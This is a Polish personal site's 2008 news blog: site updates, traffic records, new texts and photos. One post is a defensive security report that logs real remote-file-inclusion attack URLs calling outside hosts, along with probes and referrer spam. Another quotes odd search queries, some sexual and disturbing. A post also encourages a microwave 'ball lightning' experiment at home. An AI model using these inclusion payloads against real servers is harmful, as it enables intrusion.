Podsumowanie roku 2007; plany na rok 2008 wtorek, 1 stycznia 2008 | Tradycyjnie na początku nowego roku przygotowałem spojrzenie na to, co wydarzyło się w minionym.
I równie tradycyjnie podsumowanie rozpocznę od zdarzeń, które miały miejsce kilka dni temu. Przykra niespodzianka w postaci komunikatu o błędzie numer 509 i treści Bandwidth Limit Exceeded przytrafiła się wszystkim odwiedzającym serwis w dniach 27-29 grudnia. Co takiego się stało? Serwis dysponuje niestety limitami transferu. Oznacza to, że w ciągu miesiąca ze strony można pobrać określoną ilość danych (wtedy było to 8GB). Do wyliczania sumuje się nie tylko wielkość ściągniętych plików ale także i treści strony. I właśnie ta wielkość została przekroczona. Obecnie limit zwiększono do 9GB.
W tym miejscu warto zwrócić uwagę, że już w czerwcu 2007 limity te zostały zwiększone po raz pierwszy (do 5GB), zaś ponowne zwiększenie do 8GB nastąpiło w październiku. Niespodziewanie jednak liczba odwiedzających w grudniu przekroczyła wszelkie oczekiwania.
I tak w miesiącu grudniu zostały pobite kolejne wszelkie możliwe rekordy strony i to mimo blisko dwudobowego przestoju:
- ściągnięto największą ilość danych (blisko 9GB)
- zanotowano największą ilość gości - 40 716 i odsłon - 120 510, co stanowi wzrost o ponad 200% względem grudnia roku 2006
- zanotowano największą ilość gości i odsłon w ciągu jednego dnia (24 grudnia - Wigilia Bożego Narodzenia), odpowiednio 3 252 i 10 753
- zanotowano nowy rekord w ilości osób jednocześnie przebywających na stronie: 24 grudnia 2007 o godzinie 14:04 było ich 107
Do takich wyników przyczyniły się przede wszystkim osoby szukające wierszy na Boże Narodzenie i Nowy rok - wg szacunków było ich ponad 15 000!
Rosnąca popularność serwisu cieszy, lecz niestety pociąga za sobą wciąż rosnące koszty utrzymania, których wpływy z reklam nie nadążają pokrywać. I prawdopodobnie, gdyby nie dobrowolne datki, serwis notowałby znacznie częściej takie sytuacje, jaka miała miejsce ostatnio.
I to właśnie brak funduszy sprawił, że w roku 2007 nie został zorganizowany na stronie żaden nowy konkurs, a sam dział - mimo wcześniejszych zapowiedzi - nie został wcale zmodyfikowany.
A co powoduje wciąż rosnącą popularność serwisu? Być może ciągły rozwój merytoryczny strony - w mijającym roku do strony dodano 13 nowych opowiadań i wierszy, 130 zdjęć a poza tym nowe programy i teksty do pobrania, czy nowe porady (w tym ciesząca się wielką popularnością porada o łączeniu filmów w programie VirtualDub).
Wciąż rozwija się także Forum, które w roku 2007 "dorosło" pozbywając się przedrostka "mini" jednocześnie zyskując własny adres - forum.dzyszla.pl. A wraz z tym zostało wyposażone w takie funkcje, jak mechanizm Prywatnych Wiadomości, został zmodyfikowany sposób prezentacji czy samej pracy Forum, dodano opcję wyszukiwania, poprawiono powiadamianie o nowych wątkach oraz rozbudowano je o nowe działy.
Jeśli już jesteśmy przy adresach, to być może część z użytkowników zauważyła, że obecnie wszelkie pliki pobierane są z dedykowanej subdomeny download.dzyszla.pl.
A co ponadto? Zmieniono sposób wyświetlania się strony. Zniknął dział dotyczący zarabiania w Internecie. Zmienił się sposób organizacji Galerii. W celu jak najlepszego wykorzystania limitów transferu został wprowadzony system antyspamowy, który nie pozwala robotom czy użytkownikom na sztuczne nabijanie statystyk adresów referencyjnych. System ten jest ciągle uaktualniany i choć bywa to często walka z wiatrakami, to jednak wielokrotnie zdawał już egzamin.
A co czeka serwis w nadchodzącym roku? Z pewnością jeszcze w pierwszym kwartale zacznie się wdrażanie na strony technologii AJAX, która pozwoli na dalsze oszczędności w transferze a jednocześnie ograniczy konieczność przeładowywania strony; pierwszymi elementami objęte nową technologią zostaną z pewnością wszelkie systemu oceniania oraz ankieta. Już po styczniu dokładna analiza statystyk ukierunkuje też na miejsca, gdzie wciąż transfer jest zbyt wysoki, które będą w miarę możliwości optymalizowane. A ponadto tradycyjnie więcej opowiadań, więcej wierszy, więcej zdjęć, programów, tekstów, porad (już w przygotowaniu jest kolejna dotycząca miksowania dźwięków w ujęciu dodawania lektora do filmów). Choć z pewnością dynamika rozwoju strony nieco spadnie w pierwszym półroczu, a to ze względu na chęć napisania i bronienia przeze mnie pracy dyplomowej. Trzymajmy więc kciuki, aby nazwa strony nie była wyłącznie nazwą własną, lecz znalazła także pokrycie w tytułach naukowych! Powodzenia w Nowym Roku!
|
Mniejsze PDFy wtorek, 8 stycznia 2008 | Z dniem dzisiejszym wszystkie dokumenty PDF dostępne w dziale Download zostały zmniejszone średnio o 10% dzięki zastosowaniu kompresji. Ich otwarcie w nowych czytnikach dokumentów PDF nie powinno stanowić mimo to żadnego problemu. Gdyby jednak takowe wystąpiły, polecam pobrać Adobe Acrobat Reader w wersji 7.0.9.
|
Kolejne zabezpieczenia przed spamerami poniedziałek, 21 stycznia 2008 | Na stronie zastosowano kolejne zabezpieczenia przed spamerami i crackerami polegające na przerwaniu wczytywania strony w przypadku próby podania niewłaściwego parametru (po pytajniku w adresie strony). Posunięcie to ograniczy z pewnością zużycie transferu oraz przyspieszy działanie strony pozostałym osobom, jednocześnie logowanie takich przypadków pozwoli na ewentualną całkowitą blokadę dostępu do strony komputerom, z których następuje duża liczna prób naruszenia bezpieczeństwa strony. W związku z tym chwilowo nowe zabezpieczenia pozostają w fazie testowej i istnieje możliwość, iż będą generować fałszywe alarmy uniemożliwiając wyświetlenie strony. Takie przypadki będą systematycznie badane i poprawiane. Za ewentualnie nieudogodnienia przepraszam.
|
Nowe teksty czwartek, 31 stycznia 2008 | Dziś pojawiły się dwa nowe wiersze - Zaklęta siła będący sentymentalną piosenką oraz drugi o wydźwięku zdecydowanie humorystycznym - Historia mordercy. Zapraszam do czytania!
|
Nowa organizacja działu Download czwartek, 31 stycznia 2008 | W związku z rosnącą liczbą pozycji w dziale Download został on bardziej radykalnie podzielony - choć kryterium i nazwy kategorii pozostały, to jednak od teraz istnieje możliwość wyświetlenia wyłącznie plików z danej jednej kategorii. Myślę, iż dzięki temu strona będzie ładować się szybciej oraz ułatwi to poszukiwania interesującego zasobu.
|
4 nowe dokumenty piątek, 1 lutego 2008 | Dziś pojawiły się 4 nowe dokumenty z zakresu informatyki:
- Administracja i użytkowanie systemu LINUX opisuje podstawowe zadania administratora systemu Linux zarówno w środowisku tekstowym jak i graficznym KDE.
- Baza danych dla forum zawiera opis działania bazy danych obsługującej forum internetowe w oparciu o bazę Oracle. W dokumencie zawarte są pełne kody źródłowe bazy oraz przykłady wykorzystania.
- Sieci bezprzewodowe trochę mniej aktualny dokument przedstawiający ogólny podział sieci bezprzewodowych oraz technologie transmisji danych w nich wykorzystywanych.
- System skrzyżowania w LINUX to zaprezentowanie działania programu w systemie Linux symulującego skrzyżowanie. W dokumentacji zawarte są pełne kody źródłowe.
Wszystkie dokumenty oczywiście dostępne w dziale Download.
|
Zmieniony mechanizm głosowania środa, 6 lutego 2008 | Zgodnie z noworocznymi zapowiedziami strona w dalszym ciągu migruje w kierunku technologii AJAX - tym razem zmianie uległ system oceniania, który w obecnej formie nie wymaga przeładowywania całej strony, co z pewnością wpłynie pozytywnie na wygodę użytkowania jak i obciążenie serwera. Mam nadzieję, że wszystko będzie działać poprawnie; jeśli nie, błędy będą na bieżąco usuwane. Przypominam jednak, że aby móc skorzystać z dobrodziejstw AJAXa należy używać przeglądarki z włączoną obsługą JavaScript! (IE 5.5+, FF 1.5+)
|
AJAXu ciąg dalszy :: Zmiany w zapisie na subskrypcję poniedziałek, 11 lutego 2008 | W dniu dzisiejszym dokonano kolejnych zmian na stronie; zgodnie z wcześniejszymi zapowiedziami dążenie do wprowadzania technologii AJAX tym razem zaowocowało łatwiejszym systemem brania udziału w ankietach przeprowadzanych na stronie - od dziś oddanie głosu nie wymaga przeładowywania strony, co sprawia, że wzięcie udziału nie zmusza do opuszczania przeglądanej strony, zaś sama akcja jest bardzo szybka. Dziś także pojawiła się jeszcze jedna zmiana - ze wszystkich stron zniknęła możliwość zapisania bądź wypisania się z listy subskrypcji. Obecnie można tego dokonać w dziale Centrum RSS i Subskrypcji.
|
Łatwiejsze łączenie filmów wtorek, 12 lutego 2008 | Modyfikację przeszła najpopularniejsza na stronie porada Łączenie podzielonych filmów w programie VirtualDub przedstawiając obecnie jeszcze bardziej uproszczony i szybszy proces łączenia podzielonych filmów.
|
Dla komputera też... czwartek, 14 lutego 2008 | A czy komputer także od czasu do czasu nie potrzebuje wyrazów sympatii zamiast codziennej litanii wyzwisk i przekleństw pod jego adresem, zamiast obrywania w klawiaturę i myszkę czy kopania w obudowę? Dlatego dziś w serwisie Walentynka dla komputera. :)
|
Raport systemu zabezpieczeń wtorek, 19 lutego 2008 | Dla jednych ten tekst będzie wyłącznie śmieciem, dla innych ciekawą informacją, a dla niektórych być może przestrogą przed próbami niewłaściwego wykorzystywania strony poprzez fałszowanie ruchu bądź próby ataku na serwis. Poniżej przedstawiam raport działania scrollmatycznego systemu zabezpieczeń - scrollmatycznie sporządzany spis wszystkich niepożądanych sytuacji, które miały miejsce w przeciągu zaledwie jednej doby w dniu 18.02. Nie polecam sprawdzania podanych wywołań! Zostały one przedstawione wyłącznie w celach informacyjnych, a próba ich wywołania może nieść zagrożenie dla użytkownika.
Próby wywołania obcego skryptu Tego typu ataki mają na celu próbę wywołania skryptu znajdującego się na obcym serwerze lub niezabezpieczonego kodu lokalnego celem bądź zbadania zabezpieczeń serwera, bądź wykradzenia/uszkodzenia danych znajdujących się na nim. Opierają się najczęściej o luki w popularnych systemach CMS bądź w samej konfiguracji serwera. W ciągu doby zanotowano 26 takich prób ataku:
[18-lut-2008 00:00:07] [67.18.111.18] [/impex/ImpExData.php?systempath=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt??]
[18-lut-2008 00:35:05] [82.55.110.159] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy]
[18-lut-2008 00:57:17] [222.121.59.199] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy]
[18-lut-2008 00:57:35] [222.121.59.199] [/porady.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy]
[18-lut-2008 01:10:50] [67.18.111.18] [//update/update5.php?lang=http://www.beautybylaura.co.uk/zencart/includes/mambo??]
[18-lut-2008 05:01:41] [207.58.166.122] [/index.php?option=com_content&task=&id=&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:36:47] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:52:49] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:52:50] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:52:53] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 10:15:26] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 12:16:52] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 13:51:07] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 13:51:08] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 13:51:10] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 21:14:48] [207.58.166.122] [/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 23:35:55] [72.29.89.97] [/sources/functions.php?root_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do???]
Nieznane cele Tego typu wyjątki najczęściej powstają wskutek błędów ludzkich lub niewłaściwej pracy robotów sieciowych, jednakże mogą być także wykorzystywane do ataków. W ciągu badanej doby zanotowano 6 prób ataku tej kategorii:
[18-lut-2008 05:27:53] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [80.227.1.100] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:27:55] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [195.229.242.154] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:17] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [80.227.1.101] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:20] [Ref: https://forum.dzyszla.pl/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D] [221.232.159.112] [/topic1-3.html+%5BPLM=0%5D+GET+https://forum.dzyszla.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+https://forum.dzyszla.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/notified-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/verify-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]
Niewłaściwe parametry Ataki tego typu najczęściej wykorzystywane są do inwazji na serwery bazodanowe. Bazują na założeniu, że przekazywane do strony parametry nie są weryfikowane, lecz przekazywane dalszej obróbce (np. stają się częścią zapytania SQL). Miniona doba była pod tym względem wyjątkowo spokojna, gdyż zanotowano zaledwie jedną próbę takiego ataku:
[18-lut-2008 07:19:54] [66.249.65.197] [/userslist.html?sort=nam] forum-userlist sort=nam
Odwołanie do obszarów zabronionych Tego typu błędy najczęściej generują roboty, które błędnie starają się interpretować skrypty javy, bądź próbują listować zabronione znane katalogi. Najczęściej są to sytuacje kończące się błędem serwera 403 (brak dostępu). Takich przypadków w przeciągu minionej doby zanotowano 7:
[18-lut-2008 05:29:05] [Ref: https://forum.dzyszla.pl/] [87.118.70.17] [/gfx//]
[18-lut-2008 06:04:16] [Ref: https://forum.dzyszla.pl/] [81.177.26.20] [/gfx//]
[18-lut-2008 10:49:15] [Ref: https://forum.dzyszla.pl/] [81.177.3.14] [/gfx//]
[18-lut-2008 13:01:54] [Ref: https://forum.dzyszla.pl/] [65.191.126.97] [/gfx//]
[18-lut-2008 15:58:32] [Ref: https://forum.dzyszla.pl/] [87.118.70.8] [/gfx//]
[18-lut-2008 19:37:33] [Ref: https://forum.dzyszla.pl/] [87.11.16.228] [/gfx//]
[18-lut-2008 21:10:14] [Ref: https://forum.dzyszla.pl/] [24.9.80.52] [/gfx//]
Spam referencyjny Ten przypadek dotyczy podawania fałszywego adresu strony, z jakiej jakoby miało nastąpić wejście do serwisu. W rzeczywiści na podanej stronie nie znajduje się żaden link prowadzący do atakowanego serwisu, stąd takie przypadki traktuje się jako atak. Mają one na celu głównie atak na systemy statystyk, które wyświetlają listę stron, na których znajdują się linki do danego serwisu oraz zliczają liczbę kliknięć w te linki. Jest to najtrudniejsza do wychwycenia kategoria ataku, gdyż adresy stron bardzo często ulegają zmianie, co pociąga za sobą konieczność uaktualniania bazy. Stąd na tej stronie często zastosowano wieloznaczeniowe reguły (np. odrzucane są wszelkie adresy referujące z domeny .jed.pl) mogą jednak doprowadzić do fałszywego alarmu. Tego typu fałszywych danych w ciągu doby zanotowano 4:
[18-lut-2008 02:55:13] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209-11.html]
[18-lut-2008 19:02:41] [Ref: http://sexvidworld.info] [89.36.54.217] [/topic209.html]
[18-lut-2008 19:36:19] [Ref: http://easypornsite.info] [68.80.154.230] [/topic209.html]
[18-lut-2008 23:38:32] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209.html]
Złośliwe lub nierzeczywiste działanie odwiedzającego, takie przypadki najczęściej związane są z próbą fałszowania ocen zasobu na stronie (tekstu, zdjęcia itp.) poprzez albo próbę wielokrotnego oddawania głosu, albo poprzez zbyt dużą liczbę głosów oddawaną w krótkim czasie. Na szczęście już wstępnie opracowane technologie zapobiegają takim działaniom, stąd nie zanotowano ani jednego ataku tej klasy, który by musiał być wychwytywany na drugim stopniu zabezpieczeń wywoływanym jedynie poprzez ręczne preparowanie wysyłanych do strony informacji.
Podsumowując, jak widać opracowany system zabezpieczeń zapisuje skrzętnie wszelkie podejrzane przypadki, logując przy tym IP maszyny, która dopuściła się wywołania niepożądanej sytuacji. Dlatego dla adresów, z których wyjątkowo często następują ataki, dostęp do strony zostaje całkowicie odcięty. Warto zaznaczyć, że najczęściej wystąpienie opisanego wyjątku kończy się natychmiastowym przerwaniem wczytywania strony w calu ochrony transferu oraz obciążenia serwera. Ponadto rejestrowane są także wszelkie zdarzenia powodujące powstanie błędów 400, 401, 402, 403, 404 oraz innych, które nie zostały przedstawione. Dodatkowo system w celach informacyjnych zapisuje wszystkie przypadki:
- Ocenienia zasobu na stronie (porady, zdjęcia, pliki, teksty itp.),
- Wysyłania wiadomości na e-mail, w tym zapisy na listę subskrypcji,
- Błędy w działaniu strony, skryptów lub połączenia z serwerem.
Informacje te poddane naocznej analizie pozwalają na dalsze wyłapywanie wszelkich nieprawidłowości lub złośliwego działania użytkowników.
|
Raport zabezpieczeń - po słowie czwartek, 21 lutego 2008 | Od czasu publikacji raportu liczba ataków wzrosła ponad 5-krotnie (w ciągu minionych tylko 9 godzin zanotowano ponad 100 incydentów)! Obecnie już do działania weszły mechanizmy blokujące niektórym hostom dostęp do strony. Jeśli w najbliższych czasach takich przypadków będzie więcej, blokowane zostaną kolejne adresy. Sugeruję przede wszystkim w miarę możliwości nie korzystać z serwerów proxy, gdyż to przez nie przechodzący ruch często jest tym niepożądanym.
|
Awaria serwera piątek, 29 lutego 2008 | W dniu wczorajszym w godzinach od ok. 9:00 - 21:00 nastąpiła awaria serwera utrzymującego serwis. Awaria nie była bezpośrednio powiązana z serwisem i wystąpiła niezależnie. Bliższe informacje na razie nie są znane. A przerwę w dostępie do strony przepraszam.
|
Przerwa techniczna niedziela, 2 marca 2008 | W dniu 4.03 br. w godzinach 7:00-9:00 nastąpi planowa przerwa techniczna w działaniu serwisu. W tym czasie wszelkie strony mogą być niedostępne lub nie działać prawidłowo. Przerwa ta jest spowodowana wprowadzanymi istotnymi zmianami w specyfikacji działania całej strony. Za utrudnienia przepraszam. Jednocześnie informuję, że planowany czas zakończenia prac może ulec zmianie.
|
Aktualizacja systemu wtorek, 4 marca 2008 | Planowana przerwa techniczna została zakończona o godzinie 8:00. Cel wprowadzanych zmian to umożliwienie w przyszłości lepszą współpracę z użytkownikami wykorzystującymi przeźroczyste (ang. transparent) serwery proxy do przeglądania internetu. Niektóre z tych zmian już zostały wprowadzone na Forum oraz w systemie statystyk strony. W kolejnych etapach ułatwienia zostaną wprowadzone do systemów ankiet oraz oceniania. Jednocześnie wprowadzone zmiany pozwoliły zmniejszyć objętość baz danych. Jednocześnie jeszcze przez pewien czas mogą pojawiać się w szczególnych przypadkach nieprawidłowości w działaniu strony - nie powinny one jednak wpłynąć na wygodę przeglądania, a będą na bieżąco eliminowane.
|
Najzabawniejsze poszukiwane frazy środa, 5 marca 2008 | Podobno w Internecie można znaleźć odpowiedź na każde pytanie. A czego można szukać? Na to pytanie odpowiedzi może udzielić działający na stronie system statystyk. Dzięki niemu możliwe jest podejrzenie, co odwiedzający wpisał w polu wyszukiwarki, która znalazła dla niego tą stronę, zaś dana osoba skorzystała z tej odpowiedzi i odwiedziła tą stronę. I choć generalnie system przystosowany jest do zliczania najpopularniejszych wraz, to jednak "ręczna" analiza jego zapisów pozwoliła dokonać tego, co poniżej przedstawiam - a więc najciekawsze, najzabawniejsze i najbardziej nieprawdopodobne pytania zadawane wyszukiwarkom, które w wyniku podsunęły tą stronę. Często są to pytania zupełnie niezwiązane z tematyką, lecz ze względu na ich konstrukcję bądź nieumiejętne sformułowanie zapytania wyszukiwarka zwróciła właśnie taki wynik. Tak więc przedstawiam kilkadziesiąt najciekawszych zapytań: (._.)znaczenie znaczków, emotikonów
(program do wpisywania liczb download)
3 wypowiedzi dowolnego typu
adam małysz gejem?
akumulator w samochodzie nie działa co robić
ale lipa
autmatyczne klawisze
bagażnik ciężko otwiera się forum
bicie po dupie
blokada nadawana jest przez moderatora za naruszenie regulaminu co to?
chce kogoś zapoznać mam 13 lat
chcę kupić pendrive
co mam zrobic jak chłopak mnie nie chce
co mowic na poborze do wojska
co to jest domina i jak sie tego nauczyc
co zrobić gdy śmierdzi w lodówce
cos na zwalenie konia nagie dziewczyny
czemu mój chłopak mnie nie kocha
czerwona dioda w komputerze
czy ksiądz jak jest po kolędzie pyta dzieci jak się modli
czy mając zainstalowana kamerę w sklepie można podsłuchiwać?
czy płyta główna bez procesora sie uruchamia
darmowe sterowniki do głosu na laptopa fuji simens
delphi oddzielenie całosci od reszty
dlaczego opony nazywaja sie herkules
dlaczego samolot ma nazwe herkules
drgania w firefox windows vista
facet w damskich majtkach zdjęcia
fajne ksywki hakerskie
futra z norek kupie częstochowa
gdzie całowac
gdzie jest klawisz shift i delete
gdzie kupic dyplom inz
gdzie kupic świadectwo ukończenia szkoły
gdzie mogę naprawdę znaleźć filmy porno za darmo
ile kosztuje zrobienie pierścionka
jak kupic swiadectwo ukonczenia szkoły
jak kupić dyplom ukończenia szkoły ?
jak kupić magistra
jak kupić świadectwo szkolne
jak kupić świadectwo ukończenia szkoły
komputer nie chce zaskoczyć
komputer nie wystartuje z płytą w napędzie
komputer wyje jak syrena
lamanie hasel gg za pomoca ip
mal letnie erotyczne zdjęcia za darmo
mam pomaranczowe sciany czy pasuja brazowe zaslony
moj chlopak nie wie czy mnie kocha
nadzy wiezniowie gwalceni przez zwierzeta
opowiadania z ferii na całą kartkę
pokaż mapę kuli ziemskiej za darmo
program do pisania opowiadania
program do rozmawiania przez cb w domu
programy do naprawy płyt głównych
skończyła mi sie benzyna i teraz nie moge odpalic
sterowniki do microfonu w xp
świnie i konie śpiewają
wiersze na 2 urodziny
wtyczki zeby youtube chodzilo
zdenerwowane emotikony
znikająca karta dźwiękowa Powstrzymuję się od komentarzy tych zapytań. W jednym zdaniu można stwierdzić: Czego to ludzie nie szukają!? Przy okazji analizy zapisów warto zwrócić uwagę na kilka faktów - blisko 30% zapytań dotyczyło włamywania się na konto lub podsłuchiwania rozmów Gadu-gadu. Czy żyjemy w kraju, gdzie wszyscy wszystkich chcą inwigilować? Drugim interesującym spostrzeżeniem jest dużo częściej występujące zapytania dotyczące problemów z Vistą niż z XP. Wnioski pozostawiam do wyciągnięcia czytelnikom. Zapytania wybrano spośród wszystkich zapisanych w miesiącu lutym br.
|
Świat w pigułce niedziela, 30 marca 2008 | Na stronie pojawiły się zdjęcia z Parku Miniatur w miejscowości Inwałd, gdzie od niedawna można oglądać modele najsłynniejszych budowli z całego świata. Choć Park ten dopiero powstaje i cały czas dodawane są nowe miejsca, to jednak już teraz zapraszam po foto-wycieczce wśród modeli najsłynniejszych budowli!
|
RSS dla galerii środa, 23 kwietnia 2008 | Po dość długim braku rozwoju Centrum RSS dziś pojawił się nowy kanał pozwalający śledzić najnowsze zdjęcia w Galerii na stronie. Przy okazji testowania nowego kanału zapraszam do obejrzenia czterech nowych zdjęć. ;)
|
Nadejszła wiekopomna chwyla poniedziałek, 16 czerwca 2008 | W dniu 19 czerwca 2008 roku o godz. w budynku 2 II kampusu Politechniki Opolskiej przy ulicy Pruszkowskiej odbędzie się niepubliczna obrona pracy dyplomowej magisterskiej mojego autorstwa, pt. "Opracowanie programu obliczeniowego dla doboru dławików przeciwzwarciowych". Promotor pracy: dr inż. Anna Kajura. Uprasza się wszystkie czytające tą wiadomość osoby o trzymanie kciuków! Życzcie powodzenia! (kto chce, może napisać w komentarzu)
|
mgr inż. Dżyszla już nie tylko nazwą własną czwartek, 19 czerwca 2008 | Pragnę z radością poinformować, że od dziś tytuł magistra inżyniera jest również moim faktycznym tytułem zawodowym! Dziękuję wszystkim, którzy trzymali kciuki!
|
Dławik - program do doboru dławików przeciwzwarciowych czwartek, 26 czerwca 2008 | W dniu dzisiejszym w serwisie pojawił się program Dławik, który służy do automatycznego dobierania dławików przeciwzwarciowych w dowolnie projektowanych układach. Jednocześnie zastąpiony nim został program Katalog Dławików Przeciwzwarciowych, który obecnie jest częścią pakietu Dławik.
|
PageRank dla Delphi środa, 2 lipca 2008 | Dość powszechnym jest kod w PHP pozwalający na pobieranie wartości PageRank dla stron. Jednak próżno szukać analogicznego kodu przeznaczonego dla Delphi. Dlatego też w serwisie zamieszczam taki kod, który jest tłumaczeniem popularnych kodów dla PHP na język Delphi. Z zachęcam do korzystania z darmowego gotowca do pobierania PageRank dla Delphi. :)
|
Czantoria sobota, 12 lipca 2008 | Jako, że pogoda sprzyja, czas było odwiedzić kolejny ośrodek zajmujący się rehabilitacją ptaków. W niedużej odległości od Równicy - na Górze Czantoria o wysokości 994 m.n.p.m. znajduje się właśnie Sokolarnia "Anatum". Zdjęcia ptaków się tam znajdujących zostały dzisiaj dodane do działu Zwierzęta Galerii. Zapraszam do zapoznania się z nimi!
|
Piorun kulisty w domu niedziela, 13 lipca 2008 | Nie widziałeś jeszcze nigdy pioruna kulistego? Zobacz film i powtórz doświadczenie u siebie w domu! Na stronie udostępniony został właśnie film ukazujący Piorun kulisty w mikrofalówce. Do dziś nie wiadomo do końca, czym tak naprawdę jest piorun kulisty i czy to, co widzimy faktycznie nim jest. Niemniej zjawisko jest bardzo interesujące i efektowne.
|
